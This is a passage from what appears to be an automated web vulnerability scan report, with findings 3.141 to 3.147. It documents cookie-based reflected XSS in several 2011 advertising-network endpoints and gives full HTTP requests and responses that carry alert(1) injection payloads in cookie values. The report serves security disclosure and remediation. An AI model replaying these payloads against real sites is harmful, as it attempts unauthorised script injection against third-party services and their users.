Cookie: put_2025=549188a1-a07c-4231-be94-7f725e1a19f7; au=GMMM871R-KIRO-10.208.77.156; put_2081=AM-00000000030620452; put_2146=6wa51p1zbco8b5ocw49utyfiu6fa98yq; put_1197=3419824627245671268; put_1430=c1e1301e-3a1f-4ca7-9870-f636b5f10e66; put_2100=usr3fd49cb9a7122f52; put_1512=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07; put_2101=8218888f-9a83-4760-bd14-33b4666730c0; put_1523=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC; put_2132=978972DFA063000D2C0E7A380BFA1DEC; lm="2 May 2011 12:48:41 GMT"; put_1994=xrd52zkwjuxh; khaos=GMMM8SST-B-HSA1; put_1986=2724386019227846218; cd=false; put_1185=2931142961646634775; rpb=5328%3D1%265671%3D1%264210%3D1%265852%3D1%264214%3D1%262939%3D1%264140%3D1%264554%3D1%266073%3D1%264222%3D1%266286%3D1%262786%3D1%264940%3D1%262372%3D1%262111%3D1%262202%3D1%262110%3D1%262112%3D1%263810%3D1%262374%3D1%265864%3D1%265487%3D1%266552%3D1%264894%3D1%264212%3D1%264705%3D1; ruid=ba34e"-alert(1)-"c78825df4d5; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; ses9=13549^1; csi9=3200914.js^1^1304949675^1304949675; ses2=12590^1&13549^1; csi2=3200913.js^1^1304949680^1304949680&3196046.js^1^1304949680^1304949680; rdk=7856/12590; rdk15=0; ses15=13549^1&13264^1&12590^2; csi15=3173215.js^2^1304949690^1304949693&3200915.js^1^1304949679^1304949679&3151665.js^1^1304949670^1304949670

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:07:01 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=7856/12590; expires=Mon, 09-May-2011 15:07:01 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk2=0; expires=Mon, 09-May-2011 15:07:01 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses2=12590^2&13549^1; expires=Tue, 10-May-2011 04:59:59 GMT; max-age=64378; path=/; domain=.rubiconproject.com
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: csi2=3196046.js^2^1304949680^1304950021&3200913.js^1^1304949680^1304949680; expires=Mon, 16-May-2011 14:07:01 GMT; max-age=604800; path=/; domain=.rubiconproject.com;
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Connection: close
Content-Type: application/x-javascript
Content-Length: 2214

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3196046"
...[SNIP]...
<img src=\"http://trgca.opt.fimserve.com/fp.gif?pixelid=287-036699&diresu=ba34e"-alert(1)-"c78825df4d5\" style=\"display: none;\" border=\"0\" height=\"1\" width=\"1\" alt=\"\"/>
...[SNIP]...

3.141. http://optimized-by.rubiconproject.com/a/7858/13549/26630-15.js [ruid cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/7858/13549/26630-15.js

Issue detail

The value of the ruid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2ffc0"-alert(1)-"2960e63a9b was submitted in the ruid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /a/7858/13549/26630-15.js?cb=0.2465566643513739 HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.nme.com/news/sufjan-stevens/56527
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_2025=549188a1-a07c-4231-be94-7f725e1a19f7; au=GMMM871R-KIRO-10.208.77.156; put_2081=AM-00000000030620452; put_2146=6wa51p1zbco8b5ocw49utyfiu6fa98yq; put_1197=3419824627245671268; put_1430=c1e1301e-3a1f-4ca7-9870-f636b5f10e66; put_2100=usr3fd49cb9a7122f52; csi9=3188005.js^1^1304340479^1304340479; put_1512=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07; put_2101=8218888f-9a83-4760-bd14-33b4666730c0; put_1523=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC; put_2132=978972DFA063000D2C0E7A380BFA1DEC; lm="2 May 2011 12:48:41 GMT"; put_1994=xrd52zkwjuxh; khaos=GMMM8SST-B-HSA1; csi15=3153732.js^1^1304367467^1304367467&3166422.js^1^1304366186^1304366186&3140642.js^2^1304363213^1304364698&3167237.js^2^1304361606^1304361617&3200915.js^1^1304360968^1304360968&3203914.js^3^1304360291^1304360963&3190993.js^3^1304358760^1304359002&3151969.js^2^1304340485^1304341092&3151966.js^2^1304340392^1304340510&3199969.js^1^1304340482^1304340482&3186719.js^2^1304340387^1304340476&3188306.js^1^1304340471^1304340471&3196947.js^1^1304340427^1304340427&3201778.js^1^1304340414^1304340414&3151650.js^3^1304340335^1304340359; ruid=2ffc0"-alert(1)-"2960e63a9b; csi2=3204821.js^1^1304807875^1304807875; put_1986=2724386019227846218; cd=false; put_1185=2931142961646634775; rpb=5328%3D1%265671%3D1%264210%3D1%265852%3D1%264214%3D1%262939%3D1%264140%3D1%264554%3D1%266073%3D1%264222%3D1%266286%3D1%262786%3D1%264940%3D1%262372%3D1%262111%3D1%262202%3D1%262110%3D1%262112%3D1%263810%3D1%262374%3D1%265864%3D1%265487%3D1%266552%3D1%264894%3D1%264212%3D1%264705%3D1

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:01:26 GMT
Server: RAS/1.3 (Unix)
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: ruid=2ffc0"-alert(1)-"2960e63a9b^1^1304949686^2915161843; expires=Sun, 07-Aug-2011 14:01:26 GMT; max-age=7776000; path=/; domain=.rubiconproject.com;
Set-Cookie: rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; path=/; domain=.rubiconproject.com;
Set-Cookie: rdk=7858/13549; expires=Mon, 09-May-2011 15:01:26 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk15=0; expires=Mon, 09-May-2011 15:01:26 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses15=13549^1; expires=Tue, 10-May-2011 04:59:59 GMT; max-age=64713; path=/; domain=.rubiconproject.com
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Connection: close
Content-Type: application/x-javascript
Content-Length: 2114

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3152064"
...[SNIP]...
<img src=\"http://trgca.opt.fimserve.com/fp.gif?pixelid=287-036699&diresu=2ffc0"-alert(1)-"2960e63a9b\" style=\"display: none;\" border=\"0\" height=\"1\" width=\"1\" alt=\"\"/>
...[SNIP]...

3.142. http://optimized-by.rubiconproject.com/a/7858/13549/26630-2.js [ruid cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/7858/13549/26630-2.js

Issue detail

The value of the ruid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 422cd"-alert(1)-"e10ed0c79e was submitted in the ruid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /a/7858/13549/26630-2.js?cb=0.004363113781437278 HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.nme.com/news/sufjan-stevens/56527
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_2025=549188a1-a07c-4231-be94-7f725e1a19f7; au=GMMM871R-KIRO-10.208.77.156; put_2081=AM-00000000030620452; put_2146=6wa51p1zbco8b5ocw49utyfiu6fa98yq; put_1197=3419824627245671268; put_1430=c1e1301e-3a1f-4ca7-9870-f636b5f10e66; put_2100=usr3fd49cb9a7122f52; put_1512=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07; put_2101=8218888f-9a83-4760-bd14-33b4666730c0; put_1523=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC; put_2132=978972DFA063000D2C0E7A380BFA1DEC; lm="2 May 2011 12:48:41 GMT"; put_1994=xrd52zkwjuxh; khaos=GMMM8SST-B-HSA1; put_1986=2724386019227846218; cd=false; put_1185=2931142961646634775; rpb=5328%3D1%265671%3D1%264210%3D1%265852%3D1%264214%3D1%262939%3D1%264140%3D1%264554%3D1%266073%3D1%264222%3D1%266286%3D1%262786%3D1%264940%3D1%262372%3D1%262111%3D1%262202%3D1%262110%3D1%262112%3D1%263810%3D1%262374%3D1%265864%3D1%265487%3D1%266552%3D1%264894%3D1%264212%3D1%264705%3D1; ruid=422cd"-alert(1)-"e10ed0c79e; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; ses15=13549^1; csi15=3151665.js^1^1304949670^1304949670; rdk9=0; ses9=13549^1; csi9=3200914.js^1^1304949675^1304949675; rdk=7856/12590; rdk2=0; ses2=12590^1; csi2=3196046.js^1^1304949680^1304949680

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:04:49 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=7858/13549; expires=Mon, 09-May-2011 15:04:49 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk2=0; expires=Mon, 09-May-2011 15:04:49 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses2=12590^1&13549^1; expires=Tue, 10-May-2011 04:59:59 GMT; max-age=64510; path=/; domain=.rubiconproject.com
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: csi2=3200913.js^1^1304949889^1304949889&3196046.js^1^1304949680^1304949680; expires=Mon, 16-May-2011 14:04:49 GMT; max-age=604800; path=/; domain=.rubiconproject.com;
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Connection: close
Content-Type: application/x-javascript
Content-Length: 2030

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3200913"
...[SNIP]...
<img src=\"http://trgca.opt.fimserve.com/fp.gif?pixelid=287-036699&diresu=422cd"-alert(1)-"e10ed0c79e\" style=\"display: none;\" border=\"0\" height=\"1\" width=\"1\" alt=\"\"/>
...[SNIP]...

3.143. http://optimized-by.rubiconproject.com/a/7858/13549/26633-9.js [ruid cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/7858/13549/26633-9.js

Issue detail

The value of the ruid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6cbb2"-alert(1)-"3197d9eb2d5 was submitted in the ruid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /a/7858/13549/26633-9.js?cb=0.8043483311776072 HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.nme.com/news/sufjan-stevens/56527
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_2025=549188a1-a07c-4231-be94-7f725e1a19f7; au=GMMM871R-KIRO-10.208.77.156; put_2081=AM-00000000030620452; put_2146=6wa51p1zbco8b5ocw49utyfiu6fa98yq; put_1197=3419824627245671268; put_1430=c1e1301e-3a1f-4ca7-9870-f636b5f10e66; put_2100=usr3fd49cb9a7122f52; csi9=3188005.js^1^1304340479^1304340479; put_1512=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07; put_2101=8218888f-9a83-4760-bd14-33b4666730c0; put_1523=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC; put_2132=978972DFA063000D2C0E7A380BFA1DEC; lm="2 May 2011 12:48:41 GMT"; put_1994=xrd52zkwjuxh; khaos=GMMM8SST-B-HSA1; csi2=3204821.js^1^1304807875^1304807875; put_1986=2724386019227846218; cd=false; put_1185=2931142961646634775; rpb=5328%3D1%265671%3D1%264210%3D1%265852%3D1%264214%3D1%262939%3D1%264140%3D1%264554%3D1%266073%3D1%264222%3D1%266286%3D1%262786%3D1%264940%3D1%262372%3D1%262111%3D1%262202%3D1%262110%3D1%262112%3D1%263810%3D1%262374%3D1%265864%3D1%265487%3D1%266552%3D1%264894%3D1%264212%3D1%264705%3D1; ruid=6cbb2"-alert(1)-"3197d9eb2d5; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; rdk=7858/13549; rdk15=0; ses15=13549^1; csi15=3151665.js^1^1304949670^1304949670

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:03:20 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=7858/13549; expires=Mon, 09-May-2011 15:03:20 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk9=0; expires=Mon, 09-May-2011 15:03:20 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses9=13549^1; expires=Tue, 10-May-2011 04:59:59 GMT; max-age=64599; path=/; domain=.rubiconproject.com
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: csi9=3200914.js^1^1304949800^1304949800; expires=Mon, 16-May-2011 14:03:20 GMT; max-age=604800; path=/; domain=.rubiconproject.com;
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Connection: close
Content-Type: application/x-javascript
Content-Length: 2034

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3200914"
...[SNIP]...
<img src=\"http://trgca.opt.fimserve.com/fp.gif?pixelid=287-036699&diresu=6cbb2"-alert(1)-"3197d9eb2d5\" style=\"display: none;\" border=\"0\" height=\"1\" width=\"1\" alt=\"\"/>
...[SNIP]...

3.144. http://optimized-by.rubiconproject.com/a/8201/13264/25249-15.js [ruid cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/8201/13264/25249-15.js

Issue detail

The value of the ruid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 96365"-alert(1)-"6dd04684091 was submitted in the ruid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /a/8201/13264/25249-15.js?cb=0.48162996326573193 HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.irishtimes.com/newspaper/theticket/2011/0506/1224296203710.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_2025=549188a1-a07c-4231-be94-7f725e1a19f7; au=GMMM871R-KIRO-10.208.77.156; put_2081=AM-00000000030620452; put_2146=6wa51p1zbco8b5ocw49utyfiu6fa98yq; put_1197=3419824627245671268; put_1430=c1e1301e-3a1f-4ca7-9870-f636b5f10e66; put_2100=usr3fd49cb9a7122f52; put_1512=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07; put_2101=8218888f-9a83-4760-bd14-33b4666730c0; put_1523=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC; put_2132=978972DFA063000D2C0E7A380BFA1DEC; lm="2 May 2011 12:48:41 GMT"; put_1994=xrd52zkwjuxh; khaos=GMMM8SST-B-HSA1; csi2=3204821.js^1^1304807875^1304807875; put_1986=2724386019227846218; cd=false; put_1185=2931142961646634775; rpb=5328%3D1%265671%3D1%264210%3D1%265852%3D1%264214%3D1%262939%3D1%264140%3D1%264554%3D1%266073%3D1%264222%3D1%266286%3D1%262786%3D1%264940%3D1%262372%3D1%262111%3D1%262202%3D1%262110%3D1%262112%3D1%263810%3D1%262374%3D1%265864%3D1%265487%3D1%266552%3D1%264894%3D1%264212%3D1%264705%3D1; ruid=96365"-alert(1)-"6dd04684091; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; rdk15=0; ses15=13549^1; csi15=3151665.js^1^1304949670^1304949670; rdk=7858/13549; rdk9=0; ses9=13549^1; csi9=3200914.js^1^1304949675^1304949675

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:04:50 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=8201/13264; expires=Mon, 09-May-2011 15:04:50 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk15=0; expires=Mon, 09-May-2011 15:04:50 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses15=13549^1&13264^1; expires=Tue, 10-May-2011 04:59:59 GMT; max-age=64509; path=/; domain=.rubiconproject.com
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Connection: close
Content-Type: application/x-javascript
Content-Length: 2456

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3163599"
...[SNIP]...
<img src=\"http://trgca.opt.fimserve.com/fp.gif?pixelid=287-036699&diresu=96365"-alert(1)-"6dd04684091\" style=\"display: none;\" border=\"0\" height=\"1\" width=\"1\" alt=\"\"/>
...[SNIP]...

3.145. http://seg.sharethis.com/getSegment.php [__stid cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://seg.sharethis.com
Path:   /getSegment.php

Issue detail

The value of the __stid cookie is copied into the HTML document as plain text between tags. The payload ab408<script>alert(1)</script>3b5c5e16745 was submitted in the __stid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /getSegment.php?purl=http%3A%2F%2Fwww.orlandosentinel.com%2Fbusiness%2Fos-cfb-cover-casey-tv-20110509%2C0%2C6839926.story&jsref=&rnd=1304949611184 HTTP/1.1
Host: seg.sharethis.com
Proxy-Connection: keep-alive
Referer: http://www.orlandosentinel.com/business/os-cfb-cover-casey-tv-20110509,0,6839926.story
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __stid=CspT702sdV9LL0aNgCmJAg==ab408<script>alert(1)</script>3b5c5e16745; __switchTo5x=64; __utmz=79367510.1303478681.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __unam=8f891fa-12f7d623a1f-609dccbc-23; __utma=79367510.1475296623.1303478681.1303478681.1303478681.1

Response

HTTP/1.1 200 OK
Server: nginx/0.8.47
Date: Mon, 09 May 2011 14:00:21 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.3.3
P3P: "policyref="/w3c/p3p.xml", CP="ALL DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM"
Content-Length: 1368


           <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
           <html>
           <head>
           <meta http-equiv="Content-type" content="text/html;charset=UTF-8">
           
...[SNIP]...
<div style='display:none'>clicookie:CspT702sdV9LL0aNgCmJAg==ab408<script>alert(1)</script>3b5c5e16745
userid:
</div>
...[SNIP]...

3.146. http://tag.contextweb.com/TagPublish/getad.aspx [V cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tag.contextweb.com
Path:   /TagPublish/getad.aspx

Issue detail

The value of the V cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1d57c'-alert(1)-'4e697206eb9 was submitted in the V cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /TagPublish/getad.aspx?tagver=1&ca=VIEWAD&cp=536156&ct=101378&cf=728X90&cn=1&rq=1&dw=1066&cwu=http%3A%2F%2Fwww.floridatoday.com%2Farticle%2F20110508%2FNEWS01%2F105080319%2FHighly-publicized-murder-Caylee-Anthony-rivets-enrages&mrnd=74482871&if=0&tl=1&pxy=0,0&cxy=1050,3575&dxy=1050,3575&tz=300&ln=en-US HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2W4=3bZ_cGKSaikCutesUynzUXb59QbtOHa7Nv35a38qe_dW_2SdvoXWHsQ; pb_rtb_ev=1:535495.0c2aede6-6bb6-11e0-8fe6-0025900a8ffe.1|530739.4dab7d35-b1d2-915a-d3c0-9d57f9c66b07.0|535039.9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC.0|535461.2931142961646634775.1; cr=2|1|-8588966416881931568|1; FC1-WC=^53620_1_2QLwy; V=wOebwAz4UvVv1d57c'-alert(1)-'4e697206eb9; cwbh1=541%3B05%2F24%2F2011%3BLIFL1%0A1697%3B05%2F24%2F2011%3BFCRT1%0A2354%3B05%2F24%2F2011%3BZETC1%0A2532%3B05%2F26%2F2011%3BAMQU2%0A1443%3B05%2F30%2F2011%3BNETM7%0A2250%3B06%2F06%2F2011%3BEXPD1; cw=cw

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
CW-Server: CW-WEB30
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 2583
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Date: Mon, 09 May 2011 14:00:17 GMT
Connection: close
Set-Cookie: V=wOebwAz4UvVv1d57c'-alert(1)-'4e697206eb9; domain=.contextweb.com; expires=Wed, 09-May-2012 14:00:17 GMT; path=/
Set-Cookie: 536156_4_101378=1304949617628; domain=.contextweb.com; path=/
Set-Cookie: cr=2|1|-8588966416881931568|1%0a15|1|-8588960524678643521|1; domain=.contextweb.com; expires=Thu, 03-May-2012 14:00:17 GMT; path=/
Set-Cookie: vf=1; domain=.contextweb.com; expires=Tue, 10-May-2011 04:00:00 GMT; path=/

var strCreative=''
+ '<script src="http://tag.admeld.com/passback/js/610/gannett/728x90/8/meld.js"></scr'+'ipt>\n'
;
document.write(strCreative);var strCreative=''
+ '<iframe src="http://bh.context
...[SNIP]...
<img src="http://tags.bluekai.com/site/3358?id=wOebwAz4UvVv1d57c'-alert(1)-'4e697206eb9" height="1" width="1" />
...[SNIP]...

3.147. http://tag.contextweb.com/TagPublish/getad.aspx [cwbh1 cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tag.contextweb.com
Path:   /TagPublish/getad.aspx

Issue detail

The value of the cwbh1 cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3887a'-alert(1)-'d025171d98 was submitted in the cwbh1 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /TagPublish/getad.aspx?tagver=1&ca=VIEWAD&cp=536156&ct=101378&cf=728X90&cn=1&rq=1&dw=1066&cwu=http%3A%2F%2Fwww.floridatoday.com%2Farticle%2F20110508%2FNEWS01%2F105080319%2FHighly-publicized-murder-Caylee-Anthony-rivets-enrages&mrnd=74482871&if=0&tl=1&pxy=0,0&cxy=1050,3575&dxy=1050,3575&tz=300&ln=en-US HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
